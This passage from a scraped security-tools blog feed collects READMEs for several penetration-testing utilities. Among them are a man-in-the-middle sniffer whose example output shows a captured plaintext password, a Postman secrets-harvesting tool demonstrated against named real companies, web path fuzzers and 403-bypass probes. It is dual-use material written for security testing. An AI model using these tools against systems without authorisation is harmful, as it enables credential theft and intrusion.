"EC2.22 Unused EC2 security groups should be removed"
],
"AwsAccountId": "01234567890",
"Region": "eu-west-1",
"ResourceType": "AwsEc2SecurityGroup"
}

This is how MetaHub shows the previous example with output-mode json-full:

"arn:aws:ec2:eu-west-1:01234567890:security-group/sg-01234567890": {
"findings": [
{
"EC2.19 Security groups should not allow unrestricted access to ports with high risk": {
"SeverityLabel": "CRITICAL",
"Workflow": {
"Status": "NEW"
},
"RecordState": "ACTIVE",
"Compliance": {
"Status": "FAILED"
},
"Id": "arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.22/finding/01234567890-1234-1234-1234-01234567890",
"ProductArn": "arn:aws:security hub:eu-west-1::product/aws/security hub"
}
},
{
"EC2.18 Security groups should only allow unrestricted incoming traffic for authorized ports": {
"SeverityLabel": "HIGH",
"Workflow": {
"Status": "NEW"
},
"RecordState": "ACTIVE",< br/> "Compliance": {
"Status": "FAILED"
},
"Id": "arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.22/finding/01234567890-1234-1234-1234-01234567890",
"ProductArn": "arn:aws:security hub:eu-west-1::product/aws/security hub"
}
},
{
"4.2 Ensure no security groups allow ingress from 0.0.0.0/0 to port 3389": {
"SeverityLabel": "HIGH",
"Workflow": {
"Status": "NEW"
},
"RecordState": "ACTIVE",
"Compliance": {
"Status": "FAILED"
},
"Id": "arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.22/finding/01234567890-1234-1234-1234-01234567890",
"ProductArn": "arn:aws:security hub:eu-west-1::product/aws/security hub"
}
},
{
"EC2.22 Unused EC2 security groups should be removed": {
"SeverityLabel": "MEDIUM",
"Workflow": {
"Status": "NEW"
},
"RecordState": "ACTIVE",
"Compliance": {
"Status": "FAILED"
},
"Id": "arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.22/finding/01234567890-1234-1234-1234-01234567890",
"ProductArn": "arn:aws:security hub:eu-west-1::product/aws/security hub"
}
}
],
"AwsAccountId": "01234567890",
"AwsAccountAlias": "obfuscated",
"Region": "eu-west-1",
"ResourceType": "AwsEc2SecurityGroup"
}

Your findings are combined under the ARN of the resource affected, ending in only one result or one non-compliant resource.

You can now work in MetaHub with all these four findings together as if they were only one. For example, you can update these four Workflow Status findings using only one command: See Updating Workflow Status

Contributing

You can follow this guide if you want to contribute to the Context module guide.



☐ β˜† βœ‡ KitPloit - PenTest Tools!

PipeViewer - A Tool That Shows Detailed Information About Named Pipes In Windows

By: Zion3R β€” December 20th 2023 at 11:30


A GUI tool for viewing Windows Named Pipes and searching for insecure permissions.

The tool was published as part of a research about Docker named pipes:
"Breaking Docker Named Pipes SYSTEMatically: Docker Desktop Privilege Escalation – Part 1"
"Breaking Docker Named Pipes SYSTEMatically: Docker Desktop Privilege Escalation – Part 2"

Overview

PipeViewer is a GUI tool that allows users to view details about Windows Named pipes and their permissions. It is designed to be useful for security researchers who are interested in searching for named pipes with weak permissions or testing the security of named pipes. With PipeViewer, users can easily view and analyze information about named pipes on their systems, helping them to identify potential security vulnerabilities and take appropriate steps to secure their systems.


Usage

Double-click the EXE binary and you will get the list of all named pipes.

Build

We used Visual Studio to compile it.
When downloading it from GitHub you might get error of block files, you can use PowerShell to unblock them:

Get-ChildItem -Path 'D:\tmp\PipeViewer-main' -Recurse | Unblock-File

Warning

We built the project and uploaded it so you can find it in the releases.
One problem is that the binary will trigger alerts from Windows Defender because it uses the NtObjerManager package which is flagged as virus.
Note that James Forshaw talked about it here.
We can't change it because we depend on third-party DLL.

Features

  • A detailed overview of named pipes.
  • Filter\highlight rows based on cells.
  • Bold specific rows.
  • Export\Import to\from JSON.
  • PipeChat - create a connection with available named pipes.

Demo

PipeViewer3_v1.0.mp4

Credit

We want to thank James Forshaw (@tyranid) for creating the open source NtApiDotNet which allowed us to get information about named pipes.

License

Copyright (c) 2023 CyberArk Software Ltd. All rights reserved
This repository is licensed under Apache-2.0 License - see LICENSE for more details.

References

For more comments, suggestions or questions, you can contact Eviatar Gerzi (@g3rzi) and CyberArk Labs.



☐ β˜† βœ‡ KitPloit - PenTest Tools!

PacketSpy - Powerful Network Packet Sniffing Tool Designed To Capture And Analyze Network Traffic

By: Zion3R β€” December 15th 2023 at 11:30


PacketSpy is a powerful network packet sniffing tool designed to capture and analyze network traffic. It provides a comprehensive set of features for inspecting HTTP requests and responses, viewing raw payload data, and gathering information about network devices. With PacketSpy, you can gain valuable insights into your network's communication patterns and troubleshoot network issues effectively.


Features

  • Packet Capture: Capture and analyze network packets in real-time.
  • HTTP Inspection: Inspect HTTP requests and responses for detailed analysis.
  • Raw Payload Viewing: View raw payload data for deeper investigation.
  • Device Information: Gather information about network devices, including IP addresses and MAC addresses.

Installation

git clone https://github.com/HalilDeniz/PacketSpy.git

Requirements

PacketSpy requires the following dependencies to be installed:

pip install -r requirements.txt

Getting Started

To get started with PacketSpy, use the following command-line options:

root@denizhalil:/PacketSpy# python3 packetspy.py --help                          
usage: packetspy.py [-h] [-t TARGET_IP] [-g GATEWAY_IP] [-i INTERFACE] [-tf TARGET_FIND] [--ip-forward] [-m METHOD]

options:
-h, --help show this help message and exit
-t TARGET_IP, --target TARGET_IP
Target IP address
-g GATEWAY_IP, --gateway GATEWAY_IP
Gateway IP address
-i INTERFACE, --interface INTERFACE
Interface name
-tf TARGET_FIND, --targetfind TARGET_FIND
Target IP range to find
--ip-forward, -if Enable packet forwarding
-m METHOD, --method METHOD
Limit sniffing to a specific HTTP method

Examples

  1. Device Detection
root@denizhalil:/PacketSpy# python3 packetspy.py -tf 10.0.2.0/24 -i eth0

Device discovery
**************************************
Ip Address Mac Address
**************************************
10.0.2.1 52:54:00:12:35:00
10.0.2.2 52:54:00:12:35:00
10.0.2.3 08:00:27:78:66:95
10.0.2.11 08:00:27:65:96:cd
10.0.2.12 08:00:27:2f:64:fe

  1. Man-in-the-Middle Sniffing
root@denizhalil:/PacketSpy# python3 packetspy.py -t 10.0.2.11 -g 10.0.2.1 -i eth0
******************* started sniff *******************

HTTP Request:
Method: b'POST'
Host: b'testphp.vulnweb.com'
Path: b'/userinfo.php'
Source IP: 10.0.2.20
Source MAC: 08:00:27:04:e8:82
Protocol: HTTP
User-Agent: b'Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0'

Raw Payload:
b'uname=admin&pass=mysecretpassword'

HTTP Response:
Status Code: b'302'
Content Type: b'text/html; charset=UTF-8'
--------------------------------------------------

FootNote

Https work still in progress

Contributing

Contributions are welcome! To contribute to PacketSpy, follow these steps:

  1. Fork the repository.
  2. Create a new branch for your feature or bug fix.
  3. Make your changes and commit them.
  4. Push your changes to your forked repository.
  5. Open a pull request in the main repository.

Contact

If you have any questions, comments, or suggestions about PacketSpy, please feel free to contact me:

License

PacketSpy is released under the MIT License. See LICENSE for more information.



☐ β˜† βœ‡ KitPloit - PenTest Tools!

NetProbe - Network Probe

By: Zion3R β€” December 12th 2023 at 11:30


NetProbe is a tool you can use to scan for devices on your network. The program sends ARP requests to any IP address on your network and lists the IP addresses, MAC addresses, manufacturers, and device models of the responding devices.

Features

  • Scan for devices on a specified IP address or subnet
  • Display the IP address, MAC address, manufacturer, and device model of discovered devices
  • Live tracking of devices (optional)
  • Save scan results to a file (optional)
  • Filter by manufacturer (e.g., 'Apple') (optional)
  • Filter by IP range (e.g., '192.168.1.0/24') (optional)
  • Scan rate in seconds (default: 5) (optional)

Download

You can download the program from the GitHub page.

$ git clone https://github.com/HalilDeniz/NetProbe.git

Installation

To install the required libraries, run the following command:

$ pip install -r requirements.txt

Usage

To run the program, use the following command:

$ python3 netprobe.py [-h] -t  [...] -i  [...] [-l] [-o] [-m] [-r] [-s]
  • -h,--help: show this help message and exit
  • -t,--target: Target IP address or subnet (default: 192.168.1.0/24)
  • -i,--interface: Interface to use (default: None)
  • -l,--live: Enable live tracking of devices
  • -o,--output: Output file to save the results
  • -m,--manufacturer: Filter by manufacturer (e.g., 'Apple')
  • -r,--ip-range: Filter by IP range (e.g., '192.168.1.0/24')
  • -s,--scan-rate: Scan rate in seconds (default: 5)

Example:

$ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -o results.txt -l

Help Menu

Scanner Tool options: -h, --help show this help message and exit -t [ ...], --target [ ...] Target IP address or subnet (default: 192.168.1.0/24) -i [ ...], --interface [ ...] Interface to use (default: None) -l, --live Enable live tracking of devices -o , --output Output file to save the results -m , --manufacturer Filter by manufacturer (e.g., 'Apple') -r , --ip-range Filter by IP range (e.g., '192.168.1.0/24') -s , --scan-rate Scan rate in seconds (default: 5) " dir="auto">
$ python3 netprobe.py --help                      
usage: netprobe.py [-h] -t [...] -i [...] [-l] [-o] [-m] [-r] [-s]

NetProbe: Network Scanner Tool

options:
-h, --help show this help message and exit
-t [ ...], --target [ ...]
Target IP address or subnet (default: 192.168.1.0/24)
-i [ ...], --interface [ ...]
Interface to use (default: None)
-l, --live Enable live tracking of devices
-o , --output Output file to save the results
-m , --manufacturer Filter by manufacturer (e.g., 'Apple')
-r , --ip-range Filter by IP range (e.g., '192.168.1.0/24')
-s , --scan-rate Scan rate in seconds (default: 5)

Default Scan

$ python3 netprobe.py 

Live Tracking

You can enable live tracking of devices on your network by using the -l or --live flag. This will continuously update the device list every 5 seconds.

$ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -l

Save Results

You can save the scan results to a file by using the -o or --output flag followed by the desired output file name.

$ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -l -o results.txt
┏━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ IP Address   ┃ MAC Address       ┃ Packet Size ┃ Manufacturer                 ┃
┑━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
β”‚ 192.168.1.1  β”‚ **:6e:**:97:**:28 β”‚ 102         β”‚ ASUSTek COMPUTER INC.        β”‚
β”‚ 192.168.1.3  β”‚ 00:**:22:**:12:** β”‚ 102         β”‚ InPro Comm                   β”‚
β”‚ 192.168.1.2  β”‚ **:32:**:bf:**:00 β”‚ 102         β”‚ Xiaomi Communications Co Ltd β”‚
β”‚ 192.168.1.98 β”‚ d4:**:64:**:5c:** β”‚ 102         β”‚ ASUSTek COMPUTER INC.        β”‚
β”‚ 192.168.1.25 β”‚ **:49:**:00:**:38 β”‚ 102         β”‚ Unknown                      β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

Contact

If you have any questions, suggestions, or feedback about the program, please feel free to reach out to me through any of the following platforms:

License

This program is released under the MIT LICENSE. See LICENSE for more information.



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Porch-Pirate - The Most Comprehensive Postman Recon / OSINT Client And Framework That Facilitates The Automated Discovery And Exploitation Of API Endpoints And Secrets Committed To Workspaces, Collections, Requests, Users And Teams

By: Zion3R β€” December 5th 2023 at 11:30


Porch Pirate started as a tool to quickly uncover Postman secrets, and has slowly begun to evolve into a multi-purpose reconaissance / OSINT framework for Postman. While existing tools are great proof of concepts, they only attempt to identify very specific keywords as "secrets", and in very limited locations, with no consideration to recon beyond secrets. We realized we required capabilities that were "secret-agnostic", and had enough flexibility to capture false-positives that still provided offensive value.

Porch Pirate enumerates and presents sensitive results (global secrets, unique headers, endpoints, query parameters, authorization, etc), from publicly accessible Postman entities, such as:

  • Workspaces
  • Collections
  • Requests
  • Users
  • Teams

Installation

python3 -m pip install porch-pirate

Using the client

The Porch Pirate client can be used to nearly fully conduct reviews on public Postman entities in a quick and simple fashion. There are intended workflows and particular keywords to be used that can typically maximize results. These methodologies can be located on our blog: Plundering Postman with Porch Pirate.

Porch Pirate supports the following arguments to be performed on collections, workspaces, or users.

  • --globals
  • --collections
  • --requests
  • --urls
  • --dump
  • --raw
  • --curl

Simple Search

porch-pirate -s "coca-cola.com"

Get Workspace Globals

By default, Porch Pirate will display globals from all active and inactive environments if they are defined in the workspace. Provide a -w argument with the workspace ID (found by performing a simple search, or automatic search dump) to extract the workspace's globals, along with other information.

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8

Dump Workspace

When an interesting result has been found with a simple search, we can provide the workspace ID to the -w argument with the --dump command to begin extracting information from the workspace and its collections.

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --dump

Automatic Search and Globals Extraction

Porch Pirate can be supplied a simple search term, following the --globals argument. Porch Pirate will dump all relevant workspaces tied to the results discovered in the simple search, but only if there are globals defined. This is particularly useful for quickly identifying potentially interesting workspaces to dig into further.

porch-pirate -s "shopify" --globals

Automatic Search Dump

Porch Pirate can be supplied a simple search term, following the --dump argument. Porch Pirate will dump all relevant workspaces and collections tied to the results discovered in the simple search. This is particularly useful for quickly sifting through potentially interesting results.

porch-pirate -s "coca-cola.com" --dump

Extract URLs from Workspace

A particularly useful way to use Porch Pirate is to extract all URLs from a workspace and export them to another tool for fuzzing.

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --urls

Automatic URL Extraction

Porch Pirate will recursively extract all URLs from workspaces and their collections related to a simple search term.

porch-pirate -s "coca-cola.com" --urls

Show Collections in a Workspace

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --collections

Show Workspace Requests

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --requests

Show raw JSON

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --raw

Show Entity Information

porch-pirate -w WORKSPACE_ID
porch-pirate -c COLLECTION_ID
porch-pirate -r REQUEST_ID
porch-pirate -u USERNAME/TEAMNAME

Convert Request to Curl

Porch Pirate can build curl requests when provided with a request ID for easier testing.

porch-pirate -r 11055256-b1529390-18d2-4dce-812f-ee4d33bffd38 --curl

Use a proxy

porch-pirate -s coca-cola.com --proxy 127.0.0.1:8080

Using as a library

Searching

p = porchpirate()
print(p.search('coca-cola.com'))

Get Workspace Collections

p = porchpirate()
print(p.collections('4127fdda-08be-4f34-af0e-a8bdc06efaba'))

Dumping a Workspace

p = porchpirate()
collections = json.loads(p.collections('4127fdda-08be-4f34-af0e-a8bdc06efaba'))
for collection in collections['data']:
requests = collection['requests']
for r in requests:
request_data = p.request(r['id'])
print(request_data)

Grabbing a Workspace's Globals

p = porchpirate()
print(p.workspace_globals('4127fdda-08be-4f34-af0e-a8bdc06efaba'))

Other Examples

Other library usage examples can be located in the examples directory, which contains the following examples:

  • dump_workspace.py
  • format_search_results.py
  • format_workspace_collections.py
  • format_workspace_globals.py
  • get_collection.py
  • get_collections.py
  • get_profile.py
  • get_request.py
  • get_statistics.py
  • get_team.py
  • get_user.py
  • get_workspace.py
  • recursive_globals_from_search.py
  • request_to_curl.py
  • search.py
  • search_by_page.py
  • workspace_collections.py


☐ β˜† βœ‡ KitPloit - PenTest Tools!

C2-Search-Netlas - Search For C2 Servers Based On Netlas

By: Zion3R β€” December 4th 2023 at 11:30

C2 Search Netlas is a Java utility designed to detect Command and Control (C2) servers using the Netlas API. It provides a straightforward and user-friendly CLI interface for searching C2 servers, leveraging the Netlas API to gather data and process it locally.


Search for c2 servers based on netlas (8)

Usage

To utilize this terminal utility, you'll need a Netlas API key. Obtain your key from the Netlas website.

After acquiring your API key, execute the following command to search servers:

c2detect -t <TARGET_DOMAIN> -p <TARGET_PORT> -s <API_KEY> [-v]

Replace <TARGET_DOMAIN> with the desired IP address or domain, <TARGET_PORT> with the port you wish to scan, and <API_KEY> with your Netlas API key. Use the optional -v flag for verbose output. For example, to search at the google.com IP address on port 443 using the Netlas API key 1234567890abcdef, enter:

c2detect -t google.com -p 443 -s 1234567890abcdef

Release

To download a release of the utility, follow these steps:

  • Visit the repository's releases page on GitHub.
  • Download the latest release file (typically a JAR file) to your local machine.
  • In a terminal, navigate to the directory containing the JAR file.
  • Execute the following command to initiate the utility:
java -jar c2-search-netlas-<version>.jar -t <ip-or-domain> -p <port> -s <your-netlas-api-key>

Docker

To build and start the Docker container for this project, run the following commands:

docker build -t c2detect .
docker run -it --rm \
c2detect \
-s "your_api_key" \
-t "your_target_domain" \
-p "your_target_port" \
-v

Source

To use this utility, you need to have a Netlas API key. You can get the key from the Netlas website. Now you can build the project and run it using the following commands:

./gradlew build
java -jar app/build/libs/c2-search-netlas-1.0-SNAPSHOT.jar --help

This will display the help message with available options. To search for C2 servers, run the following command:

java -jar app/build/libs/c2-search-netlas-1.0-SNAPSHOT.jar -t <ip-or-domain> -p <port> -s <your-netlas-api-key>

This will display a list of C2 servers found in the given IP address or domain.

Support

Name Support
Metasploit βœ…
Havoc ❓
Cobalt Strike βœ…
Bruteratel βœ…
Sliver βœ…
DeimosC2 βœ…
PhoenixC2 βœ…
Empire ❌
Merlin βœ…
Covenant ❌
Villain βœ…
Shad0w ❌
PoshC2 βœ…

Legend:

  • βœ… - Accept/good support
  • ❓ - Support unknown/unclear
  • ❌ - No support/poor support

Contributing

If you'd like to contribute to this project, please feel free to create a pull request.

License

This project is licensed under the License - see the LICENSE file for details.



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Afuzz - Automated Web Path Fuzzing Tool For The Bug Bounty Projects

By: Zion3R β€” November 10th 2023 at 11:30

Afuzz is an automated web path fuzzing tool for the Bug Bounty projects.

Afuzz is being actively developed by @rapiddns


Features

  • Afuzz automatically detects the development language used by the website, and generates extensions according to the language
  • Uses blacklist to filter invalid pages
  • Uses whitelist to find content that bug bounty hunters are interested in in the page
  • filters random content in the page
  • judges 404 error pages in multiple ways
  • perform statistical analysis on the results after scanning to obtain the final result.
  • support HTTP2

Installation

git clone https://github.com/rapiddns/Afuzz.git
cd Afuzz
python setup.py install

OR

pip install afuzz

Run

afuzz -u http://testphp.vulnweb.com -t 30

Result

Table

+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| http://testphp.vulnweb.com/ |
+-----------------------------+---------------------+--------+-----------------------------------+-----------------------+--------+--------------------------+-------+-------+-----------+----------+
| target | path | status | redirect | title | length | content-type | lines | words | type | mark |
+-----------------------------+---------------------+--------+-----------------------------------+-----------------------+--------+--------------------------+-------+-------+ -----------+----------+
| http://testphp.vulnweb.com/ | .idea/workspace.xml | 200 | | | 12437 | text/xml | 217 | 774 | check | |
| http://testphp.vulnweb.com/ | admin | 301 | http://testphp.vulnweb.com/admin/ | 301 Moved Permanently | 169 | text/html | 8 | 11 | folder | 30x |
| http://testphp.vulnweb.com/ | login.php | 200 | | login page | 5009 | text/html | 120 | 432 | check | |
| http://testphp.vulnweb.com/ | .idea/.name | 200 | | | 6 | application/octet-stream | 1 | 1 | check | |
| http://testphp.vulnweb.com/ | .idea/vcs.xml | 200 | | | 173 | text/xml | 8 | 13 | check | |
| http://testphp.vulnweb.com/ | .idea/ | 200 | | Index of /.idea/ | 937 | text/html | 14 | 46 | whitelist | index of |
| http://testphp.vulnweb.com/ | cgi-bin/ | 403 | | 403 Forbidden | 276 | text/html | 10 | 28 | folder | 403 |
| http://testphp.vulnweb.com/ | .idea/encodings.xml | 200 | | | 171 | text/xml | 6 | 11 | check | |
| http://testphp.vulnweb.com/ | search.php | 200 | | search | 4218 | text/html | 104 | 364 | check | |
| http://testphp.vulnweb.com/ | produc t.php | 200 | | picture details | 4576 | text/html | 111 | 377 | check | |
| http://testphp.vulnweb.com/ | admin/ | 200 | | Index of /admin/ | 248 | text/html | 8 | 16 | whitelist | index of |
| http://testphp.vulnweb.com/ | .idea | 301 | http://testphp.vulnweb.com/.idea/ | 301 Moved Permanently | 169 | text/html | 8 | 11 | folder | 30x |
+-----------------------------+---------------------+--------+-----------------------------------+-----------------------+--------+--------------------------+-------+-------+-----------+----------+```

Json

{
"result": [
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea/workspace.xml",
"status": 200,
"redirect": "",
"title": "",
"length": 12437,
"content_type": "text/xml",
"lines": 217,
"words": 774,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea/workspace.xml"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "admin",
"status": 301,
"redirect": "http://testphp.vulnweb.com/admin/",
"title": "301 Moved Permanently",
"length": 169,
"content_type": "text/html",
"lines": 8,
"words ": 11,
"type": "folder",
"mark": "30x",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/admin"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "login.php",
"status": 200,
"redirect": "",
"title": "login page",
"length": 5009,
"content_type": "text/html",
"lines": 120,
"words": 432,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/login.php"
},
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea/.name",
"status": 200,
"redirect": "",
"title": "",
"length": 6,
"content_type": "application/octet-stream",
"lines": 1,
"words": 1,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea/.name"
},
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea/vcs.xml",
"status": 200,
"redirect": "",
"title": "",
"length": 173,
"content_type": "text/xml",
"lines": 8,
"words": 13,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea/vcs.xml"
},
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea/",
"status": 200,
"redirect": "",
"title": "Index of /.idea/",
"length": 937,
"content_type": "text/html",
"lines": 14,
"words": 46,
"type": "whitelist",
"mark": "index of",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea/"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "cgi-bin/",
"status": 403,
"redirect": "",
"title": "403 Forbidden",
"length": 276,
"content_type": "text/html",
"lines": 10,
"words": 28,
"type": "folder",
"mark": "403",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/cgi-bin/"
},
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea/encodings.xml",
"status": 200,
"redirect": "",
"title": "",
"length": 171,
"content_type": "text/xml",
"lines": 6,
"words": 11,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea/encodings.xml"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "search.php",
"status": 200,
"redirect": "",
"title": "search",
"length": 4218,
"content_type": "text/html",
"lines": 104,
"words": 364,
"t ype": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/search.php"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "product.php",
"status": 200,
"redirect": "",
"title": "picture details",
"length": 4576,
"content_type": "text/html",
"lines": 111,
"words": 377,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/product.php"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "admin/",
"status": 200,
"redirect": "",
"title": "Index of /admin/",
"length": 248,
"content_type": "text/html",
"lines": 8,
"words": 16,
"type": "whitelist",
"mark": "index of",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/admin/"
},
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea",
"status": 301,
"redirect": "http://testphp.vulnweb.com/.idea/",
"title": "301 Moved Permanently",
"length": 169,
"content_type": "text/html",
"lines": 8,
"words": 11,
"type": "folder",
"mark": "30x",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea"
}
],
"total": 12,
"targe t": "http://testphp.vulnweb.com/"
}

Wordlists (IMPORTANT)

Summary:

  • Wordlist is a text file, each line is a path.
  • About extensions, Afuzz replaces the %EXT% keyword with extensions from -e flag.If no flag -e, the default is used.
  • Generate a dictionary based on domain names. Afuzz replaces %subdomain% with host, %rootdomain% with root domain, %sub% with subdomain, and %domain% with domain. And generated according to %ext%

Examples:

  • Normal extensions
index.%EXT%

Passing asp and aspx extensions will generate the following dictionary:

index
index.asp
index.aspx
  • host
%subdomain%.%ext%
%sub%.bak
%domain%.zip
%rootdomain%.zip

Passing https://test-www.hackerone.com and php extension will genrate the following dictionary:

test-www.hackerone.com.php
test-www.zip
test.zip
www.zip
testwww.zip
hackerone.zip
hackerone.com.zip

Options

    #     ###### ### ###  ######  ######
# # # # # # # # #
# # # # # # # # # #
# # ### # # # #
# # # # # # # #
##### # # # # # # #
# # # # # # # # #
### ### ### ### ###### ######



usage: afuzz [options]

An Automated Web Path Fuzzing Tool.
By RapidDNS (https://rapiddns.io)

options:
-h, --help show this help message and exit
-u URL, --url URL Target URL
-o OUTPUT, --output OUTPUT
Output file
-e EXTENSIONS, --extensions EXTENSIONS
Extension list separated by commas (Example: php,aspx,jsp)
-t THREAD, --thread THREAD
Number of threads
-d DEPTH, --depth DEPTH
Maximum recursion depth
-w WORDLIST, --wordlist WORDLIST
wordlist
-f, --fullpath fullpath
-p PROXY, --proxy PROXY
proxy, (ex:http://127.0.0.1:8080)

How to use

Some examples for how to use Afuzz - those are the most common arguments. If you need all, just use the -h argument.

Simple usage

afuzz -u https://target
afuzz -e php,html,js,json -u https://target
afuzz -e php,html,js -u https://target -d 3

Threads

The thread number (-t | --threads) reflects the number of separated brute force processes. And so the bigger the thread number is, the faster afuzz runs. By default, the number of threads is 10, but you can increase it if you want to speed up the progress.

In spite of that, the speed still depends a lot on the response time of the server. And as a warning, we advise you to keep the threads number not too big because it can cause DoS.

afuzz -e aspx,jsp,php,htm,js,bak,zip,txt,xml -u https://target -t 50

Blacklist

The blacklist.txt and bad_string.txt files in the /db directory are blacklists, which can filter some pages

The blacklist.txt file is the same as dirsearch.

The bad_stirng.txt file is a text file, one per line. The format is position==content. With == as the separator, position has the following options: header, body, regex, title

Language detection

The language.txt is the detection language rule, the format is consistent with bad_string.txt. Development language detection for website usage.

References

Thanks to open source projects for inspiration

  • Dirsearch by by Shubham Sharma
  • wfuzz by Xavi Mendez
  • arjun by Somdev Sangwan


☐ β˜† βœ‡ KitPloit - PenTest Tools!

WebSecProbe - Web Security Assessment Tool, Bypass 403

By: Zion3R β€” November 6th 2023 at 11:30


A cutting-edge utility designed exclusively for web security aficionados, penetration testers, and system administrators. WebSecProbe is your advanced toolkit for conducting intricate web security assessments with precision and depth. This robust tool streamlines the intricate process of scrutinizing web servers and applications, allowing you to delve into the technical nuances of web security and fortify your digital assets effectively.


WebSecProbe is designed to perform a series of HTTP requests to a target URL with various payloads in order to test for potential security vulnerabilities or misconfigurations. Here's a brief overview of what the code does:

  • It takes user input for the target URL and the path.
  • It defines a list of payloads that represent different HTTP request variations, such as URL-encoded characters, special headers, and different HTTP methods.
  • It iterates through each payload and constructs a full URL by appending the payload to the target URL.
  • For each constructed URL, it sends an HTTP GET request using the requests library, and it captures the response status code and content length.
  • It prints the constructed URL, status code, and content length for each request, effectively showing the results of each variation's response from the target server.
  • After testing all payloads, it queries the Wayback Machine (a web archive) to check if there are any archived snapshots of the target URL/path. If available, it prints the closest archived snapshot's information.

Does This Tool Bypass 403 ?

It doesn't directly attempt to bypass a 403 Forbidden status code. The code's purpose is more about testing the behavior of the server when different requests are made, including requests with various payloads, headers, and URL variations. While some of the payloads and headers in the code might be used in certain scenarios to test for potential security misconfigurations or weaknesses, it doesn't guarantee that it will bypass a 403 Forbidden status code.

In summary, this code is a tool for exploring and analyzing a web server's responses to different requests, but whether or not it can bypass a 403 Forbidden status code depends on the specific configuration and security measures implemented by the target server.

Β 

pip install WebSecProbe

WebSecProbe <URL> <Path>

Example:

WebSecProbe https://example.com admin-login

from WebSecProbe.main import WebSecProbe

if __name__ == "__main__":
url = 'https://example.com' # Replace with your target URL
path = 'admin-login' # Replace with your desired path

probe = WebSecProbe(url, path)
probe.run()



☐ β˜† βœ‡ KitPloit - PenTest Tools!

TrafficWatch - TrafficWatch, A Packet Sniffer Tool, Allows You To Monitor And Analyze Network Traffic From PCAP Files

By: Zion3R β€” November 2nd 2023 at 11:30


TrafficWatch, a packet sniffer tool, allows you to monitor and analyze network traffic from PCAP files. It provides insights into various network protocols and can help with network troubleshooting, security analysis, and more.

  • Protocol-specific packet analysis for ARP, ICMP, TCP, UDP, DNS, DHCP, HTTP, SNMP, LLMNR, and NetBIOS.
  • Packet filtering based on protocol, source IP, destination IP, source port, destination port, and more.
  • Summary statistics on captured packets.
  • Interactive mode for in-depth packet inspection.
  • Timestamps for each captured packet.
  • User-friendly colored output for improved readability.
  • Python 3.x
  • scapy
  • argparse
  • pyshark
  • colorama

  1. Clone the repository:

    git clone https://github.com/HalilDeniz/TrafficWatch.git
  2. Navigate to the project directory:

    cd TrafficWatch
  3. Install the required dependencies:

    pip install -r requirements.txt

python3 trafficwatch.py --help
usage: trafficwatch.py [-h] -f FILE [-p {ARP,ICMP,TCP,UDP,DNS,DHCP,HTTP,SNMP,LLMNR,NetBIOS}] [-c COUNT]

Packet Sniffer Tool

options:
-h, --help show this help message and exit
